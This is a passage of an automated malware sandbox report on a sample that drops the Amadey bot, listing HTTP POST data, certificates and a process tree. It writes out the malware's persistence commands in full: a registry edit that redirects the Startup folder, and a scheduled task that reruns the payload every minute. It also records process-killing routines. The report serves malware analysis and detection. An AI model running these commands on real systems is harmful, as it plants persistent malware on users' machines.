                                        Aug 29, 2021 22:27:46.882788897 CEST9556OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:46.882837057 CEST9558OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:46.883337975 CEST9573OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:46.883707047 CEST9576OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:46.917854071 CEST9579OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:46.917890072 CEST9592OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:46.917941093 CEST9595OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:47.045319080 CEST9649INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        HTTPS Packets

                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                        Aug 29, 2021 22:27:09.235101938 CEST162.159.134.233443192.168.2.449737CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: mvoElayshk.exe PID: 3220 Parent PID: 5232

                                        General

                                        Start time:22:27:04
                                        Start date:29/08/2021
                                        Path:C:\Users\user\Desktop\mvoElayshk.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Users\user\Desktop\mvoElayshk.exe'
                                        Imagebase:0x280000
                                        File size:209408 bytes
                                        MD5 hash:231C758869BF91299B69A8AAE619AA48
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: a.exe PID: 6736 Parent PID: 3220

                                        General

                                        Start time:22:27:05
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\a.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\a.exe'
                                        Imagebase:0x1000000
                                        File size:203264 bytes
                                        MD5 hash:F8899BB72B91E110CD5D6DA17861369C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 62%, ReversingLabs
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: rnyuf.exe PID: 6908 Parent PID: 6736

                                        General

                                        Start time:22:27:07
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe'
                                        Imagebase:0xf00000
                                        File size:203264 bytes
                                        MD5 hash:F8899BB72B91E110CD5D6DA17861369C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000005.00000002.996019062.0000000004707000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000005.00000002.927011329.000000000131A000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000005.00000002.933021893.000000000137E000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000005.00000002.927044420.0000000001359000.00000004.00000020.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 62%, ReversingLabs
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 1256 Parent PID: 6908

                                        General

                                        Start time:22:27:07
                                        Start date:29/08/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 2220 Parent PID: 1256

                                        General

                                        Start time:22:27:08
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: schtasks.exe PID: 3684 Parent PID: 6908

                                        General

                                        Start time:22:27:08
                                        Start date:29/08/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe' /F
                                        Imagebase:0x10d0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 1844 Parent PID: 3684

                                        General

                                        Start time:22:27:08
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: reg.exe PID: 6372 Parent PID: 1256

                                        General

                                        Start time:22:27:08
                                        Start date:29/08/2021
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\4c423bc94e\
                                        Imagebase:0x3a0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: rnyuf.exe PID: 6544 Parent PID: 968

                                        General

                                        Start time:22:27:09
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        Imagebase:0xf00000
                                        File size:203264 bytes
                                        MD5 hash:F8899BB72B91E110CD5D6DA17861369C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: 1sb1iwyem7.exe PID: 5384 Parent PID: 6908

                                        General

                                        Start time:22:27:20
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
                                        Imagebase:0x400000
                                        File size:257266 bytes
                                        MD5 hash:8AB82DE9E761FA26308DAC69D6B855A6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 57%, ReversingLabs
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 4164 Parent PID: 5384

                                        General

                                        Start time:22:27:22
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 4632 Parent PID: 4164

                                        General

                                        Start time:22:27:22
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: 1sb1iwyem7.exe PID: 6268 Parent PID: 5384

                                        General

                                        Start time:22:27:23
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
                                        Imagebase:0x400000
                                        File size:257266 bytes
                                        MD5 hash:8AB82DE9E761FA26308DAC69D6B855A6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 4780 Parent PID: 6268

                                        General

                                        Start time:22:27:25
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 5896 Parent PID: 4780

                                        General

                                        Start time:22:27:25
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 6700 Parent PID: 4780

                                        General

                                        Start time:22:27:26
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: tasklist.exe PID: 5032 Parent PID: 6700

                                        General

                                        Start time:22:27:26
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\tasklist.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskList /fo CSV /nh
                                        Imagebase:0x7ff728640000
                                        File size:100352 bytes
                                        MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: taskkill.exe PID: 1316 Parent PID: 4780

                                        General

                                        Start time:22:27:28
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\taskkill.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskKill /pid 6268 /t /f
                                        Imagebase:0x7ff6ac030000
                                        File size:94720 bytes
                                        MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 1sb1iwyem7.exe PID: 5920 Parent PID: 3424

                                        General

                                        Start time:22:27:32
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
                                        Imagebase:0x400000
                                        File size:257266 bytes
                                        MD5 hash:8AB82DE9E761FA26308DAC69D6B855A6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 1288 Parent PID: 5920

                                        General

                                        Start time:22:27:34
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 5300 Parent PID: 1288

                                        General

                                        Start time:22:27:34
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 5568 Parent PID: 1288

                                        General

                                        Start time:22:27:34
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: tasklist.exe PID: 5500 Parent PID: 5568

                                        General

                                        Start time:22:27:35
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\tasklist.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskList /fo CSV /nh
                                        Imagebase:0x7ff728640000
                                        File size:100352 bytes
                                        MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 7012 Parent PID: 6908

                                        General

                                        Start time:22:27:35
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 15%, Metadefender, Browse
                                        • Detection: 57%, ReversingLabs

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 7084 Parent PID: 7012

                                        General

                                        Start time:22:27:37
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 6496 Parent PID: 7084

                                        General

                                        Start time:22:27:40
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 1sb1iwyem7.exe PID: 2740 Parent PID: 3424

                                        General

                                        Start time:22:27:41
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
                                        Imagebase:0x400000
                                        File size:257266 bytes
                                        MD5 hash:8AB82DE9E761FA26308DAC69D6B855A6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 1sb1iwyem7.exe PID: 3184 Parent PID: 5920

                                        General

                                        Start time:22:27:41
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\1sb1iwyem7\1sb1iwyem7.exe'
                                        Imagebase:0x400000
                                        File size:257266 bytes
                                        MD5 hash:8AB82DE9E761FA26308DAC69D6B855A6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 4044 Parent PID: 2740

                                        General

                                        Start time:22:27:43
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 2108 Parent PID: 3184

                                        General

                                        Start time:22:27:43
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\System32\cmd.exe' /c ''C:\Users\user\AppData\Local\Temp\1sb1iwyem7\KillDuplicate.cmd' 'C:\Users\user\AppData\Local\Temp\1sb1iwyem7' '1sb1iwyem7.exe''
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 6916 Parent PID: 4044

                                        General

                                        Start time:22:27:43
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 4732 Parent PID: 6496

                                        General

                                        Start time:22:27:43
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: conhost.exe PID: 2464 Parent PID: 2108

                                        General

                                        Start time:22:27:43
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 6704 Parent PID: 4044

                                        General

                                        Start time:22:27:44
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: tasklist.exe PID: 4204 Parent PID: 6704

                                        General

                                        Start time:22:27:44
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\tasklist.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskList /fo CSV /nh
                                        Imagebase:0x7ff728640000
                                        File size:100352 bytes
                                        MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: cmd.exe PID: 2188 Parent PID: 2108

                                        General

                                        Start time:22:27:44
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c TaskList /fo CSV /nh
                                        Imagebase:0x7ff622070000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: tasklist.exe PID: 5224 Parent PID: 2188

                                        General

                                        Start time:22:27:45
                                        Start date:29/08/2021
                                        Path:C:\Windows\System32\tasklist.exe
                                        Wow64 process (32bit):false
                                        Commandline:TaskList /fo CSV /nh
                                        Imagebase:0x7ff728640000
                                        File size:100352 bytes
                                        MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Chronological Activities

                                        Analysis Process: 5mgcqk6jl.exe PID: 6596 Parent PID: 4732

                                        General

                                        Start time:22:27:45
                                        Start date:29/08/2021
                                        Path:C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\5mgcqk6jl\5mgcqk6jl.exe'
                                        Imagebase:0x400000
                                        File size:238319 bytes
                                        MD5 hash:EC0FC802166AE83C519C5AEA89D65A53
                                        Has elevated privileges:true
